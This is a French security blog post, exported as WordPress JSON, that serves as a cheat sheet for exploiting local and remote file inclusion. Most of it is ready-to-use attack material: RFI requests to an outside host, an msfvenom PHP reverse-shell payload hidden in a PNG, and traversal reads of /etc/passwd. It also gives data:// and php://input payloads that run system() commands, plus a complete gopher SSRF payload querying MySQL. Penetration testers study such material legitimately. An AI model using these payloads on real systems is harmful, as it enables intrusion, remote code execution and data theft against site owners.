{"id":174,"date":"2021-05-24T09:43:39","date_gmt":"2021-05-24T14:43:39","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=174"},"modified":"2022-11-07T08:20:46","modified_gmt":"2022-11-07T13:20:46","slug":"test-pour-des-vulnerabilites-dinclusion-de-fichiers","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/","title":{"rendered":"Test pour des vuln\u00e9rabilit\u00e9s d’inclusion de fichiers"},"content":{"rendered":"

#Exploitation de RFI
\n

\nGET \/blog\/?lang=http:\/\/10.10.14.11\/test.php #va \u00e9chouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise\nGET \/blog\/?lang=\/\/10.10.14.11\/test\/test.php #un chemin UNC est consid\u00e9r\u00e9 local \n<\/code><\/pre><\/p>\n
## LFI, RFI, RCE
\nuniscan -u http:\/\/192.168.44.134:10000\/ -qweds<\/p>\n
### Test for LFI
\n# Harvest links from a page (to test for LFI)
\nfimap -H -u “http:\/\/192.168.56.129” -d 3 -w \/tmp\/urllist
\n#test for LFI using harvested links
\nfimap -m -l \/tmp\/urllist<\/p>\n
###Injecter un code malicieux dans un image png
\nmsfvenom -p php\/meterpreter\/reverse_tcp lhost=192.168.0.9 lport=4444 >> \/home\/hackingarticles\/Desktop\/raj.png<\/p>\n
### LFI avec WFUZZ. Essayer ces listes pour analyse. dirTraversal Linux<\/a> et dirTraversal Windows<\/a>
\n
wfuzz -c -w .\/lfi2.txt --hw 0 http:\/\/10.10.10.10\/nav.php?page=..\/..\/..\/..\/..\/..\/..\/FUZZ\n<\/code><\/pre><\/p>\n
L’octet Null %00 peut \u00eatre pratique si l’application ajoute une cha\u00eene \u00e0 la fin du param\u00e8tre avant traitement. Il est possible de contourner en utilisant le NULL Byte
\nhttp:\/\/server\/index.php?page=..\/..\/..\/etc\/passwd%00<\/code><\/p>\n
PHP Wrapper: Souvent, la vuln\u00e9rabilit\u00e9 LFI semble seulement permettre l’inclusion d’un fichier PHP sans plus. Il est bon de conna\u00eetre certaines des possibilit\u00e9s de PHP. En consid\u00e9rant le param\u00e8tre page vuln\u00e9rable, au lieu d’avoir le r\u00e9sultat de l’ex\u00e9cution du fichier php, nous allons avoir le code source. Nous allons possiblement trouver d’autres vuln\u00e9rabilit\u00e9s.<\/p>\n
\n?view=php:\/\/filter\/convert.base64-encode\/resource=\/var\/www\/html\/development_testing\/mrrobot.php\n?page=php:\/\/filter\/convert.base64-decode\/resource=index.php\n<\/code><\/pre><\/p>\n
Une deuxi\u00e8me possibilit\u00e9 est de sp\u00e9cifier dans le wrapper data le code \u00e0 inclure
\n
\n?page=data:text\/plain,<?php phpinfo(); ?>\n?page=data:,<?system($_GET['x']);?>&x=ls\n?page=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls\n<\/pre><\/p>\n
si le script v\u00e9rifie pour une image :<\/p>\n
$data=”\\x89\\x50\\x4e\\x47\\x0D\\x0A\\x1A\\x0AXXXXYYYY” . pack(“NNC”,  1024, 768, 0);<\/p>\n
payload: <\/p>\n
“data:\/\/text\/..\/..\/etc\/passwd;base64,” . base64_encode($data)<\/p>\n
le url serait ?image=data:\/\/text\/..\/..\/etc\/passwd;base64,iVBORw0KGgpYWFhYWVIZWQAABAAAAAMAAA==<\/p>\n
Une troisi\u00e8me possibilit\u00e9 est via input:\/\/
\n
\nhttp:\/\/url\/test.php?page=php:\/\/input\nPOST DATA: <?php system('id'); ?>\n<\/pre><\/p>\n
ou via file:\/\/
\n
\n?url=file:\/\/\/etc\/passwd\n<\/pre><\/p>\n
ou via le protocole gopher:\/\/. Il faut t\u00e9l\u00e9charger l’application gopherus<\/a>. \u00c0 partir de l’application gopherus, il faut sp\u00e9cifier l’exploit \u00e0 utiliser : mysql, postgresql, fastcgi, redis, smtp,zabbix, pymemcache, rbmemcache, phpmemcache ou dmpmemcache. Dans le cas de MySQL, gopherus nous demandera le nom de l’usager SQL et la requ\u00eate \u00e0 ex\u00e9cuter. Cela va fonctionner s’il n’y a pas de mots de passe associ\u00e9 au nom d’usager. parfois le cas, pour une base de donn\u00e9es locale.
\n
\nGive MySQL username: germain\nGive query to execute: use joomla; show tables;\n\nYour gopher link is ready to do SSRF :\n\ngopher:\/\/127.0.0.1:3306\/_%a6%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%65%72%6d%61%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%19%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01\n\n<\/code><\/pre><\/p>\n
On url-encode<\/a> par la suite et acc\u00e8de le lien http:\/\/searchevolution.com\/page.php?url=gopher%3A%2F%2F127.0.0.1%3A3306%2F_%25a6%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%2565%2572%256d%2561%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2519%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2520%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501%0A<\/p>\n
Il faut la plupart du temps rafra\u00eechir la page 3-4 fois avant d’obtenir un r\u00e9sultat<\/p>\n
Autres id\u00e9es
\n: Utiliser Nikto : parfois , il retourne des LFI\/RFI. Utiliser les scripts HTTP NSE de Nmap<\/p>\n","protected":false},"excerpt":{"rendered":"
#Exploitation de RFI GET \/blog\/?lang=http:\/\/10.10.14.11\/test.php #va \u00e9chouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise GET \/blog\/?lang=\/\/10.10.14.11\/test\/test.php #un chemin UNC est consid\u00e9r\u00e9 local ## LFI, RFI, RCE uniscan -u http:\/\/192.168.44.134:10000\/ -qweds ### Test for LFI # Harvest links from a page (to test for LFI) fimap -H -u “http:\/\/192.168.56.129” -d 3 -w \/tmp\/urllist #test for LFI using harvested links fimap -m -l \/tmp\/urllist ###Injecter un code malicieux dans un image png msfvenom -p php\/meterpreter\/reverse_tcp lhost=192.168.0.9 lport=4444 >> \/home\/hackingarticles\/Desktop\/raj.png ### LFI avec WFUZZ. Essayer ces listes pour analyse. dirTraversal Linux et dirTraversal Windows wfuzz -c -w .\/lfi2.txt –hw 0 <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"yoast_head":"\nTest pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Test pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"#Exploitation de RFI GET \/blog\/?lang=http:\/\/10.10.14.11\/test.php #va \u00e9chouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise GET \/blog\/?lang=\/\/10.10.14.11\/test\/test.php #un chemin UNC est consid\u00e9r\u00e9 local ## LFI, RFI, RCE uniscan -u http:\/\/192.168.44.134:10000\/ -qweds ### Test for LFI # Harvest links from a page (to test for LFI) fimap -H -u “http:\/\/192.168.56.129” -d 3 -w \/tmp\/urllist #test for LFI using harvested links fimap -m -l \/tmp\/urllist ###Injecter un code malicieux dans un image png msfvenom -p php\/meterpreter\/reverse_tcp lhost=192.168.0.9 lport=4444 >> \/home\/hackingarticles\/Desktop\/raj.png ### LFI avec WFUZZ. Essayer ces listes pour analyse. dirTraversal Linux et dirTraversal Windows wfuzz -c -w .\/lfi2.txt --hw 0\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-24T14:43:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-11-07T13:20:46+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\",\"name\":\"Test pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-24T14:43:39+00:00\",\"dateModified\":\"2022-11-07T13:20:46+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Test pour des vuln\u00e9rabilit\u00e9s d’inclusion de fichiers\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Test pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/","og_locale":"fr_CA","og_type":"article","og_title":"Test pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site","og_description":"#Exploitation de RFI GET \/blog\/?lang=http:\/\/10.10.14.11\/test.php #va \u00e9chouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise GET \/blog\/?lang=\/\/10.10.14.11\/test\/test.php #un chemin UNC est consid\u00e9r\u00e9 local ## LFI, RFI, RCE uniscan -u http:\/\/192.168.44.134:10000\/ -qweds ### Test for LFI # Harvest links from a page (to test for LFI) fimap -H -u “http:\/\/192.168.56.129” -d 3 -w \/tmp\/urllist #test for LFI using harvested links fimap -m -l \/tmp\/urllist ###Injecter un code malicieux dans un image png msfvenom -p php\/meterpreter\/reverse_tcp lhost=192.168.0.9 lport=4444 >> \/home\/hackingarticles\/Desktop\/raj.png ### LFI avec WFUZZ. Essayer ces listes pour analyse. dirTraversal Linux et dirTraversal Windows wfuzz -c -w .\/lfi2.txt --hw 0","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-24T14:43:39+00:00","article_modified_time":"2022-11-07T13:20:46+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/","name":"Test pour des vuln\u00e9rabilit\u00e9s d'inclusion de fichiers - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-24T14:43:39+00:00","dateModified":"2022-11-07T13:20:46+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Test pour des vuln\u00e9rabilit\u00e9s d’inclusion de fichiers"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/174"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=174"}],"version-history":[{"count":19,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/174\/revisions"}],"predecessor-version":[{"id":1080,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/174\/revisions\/1080"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}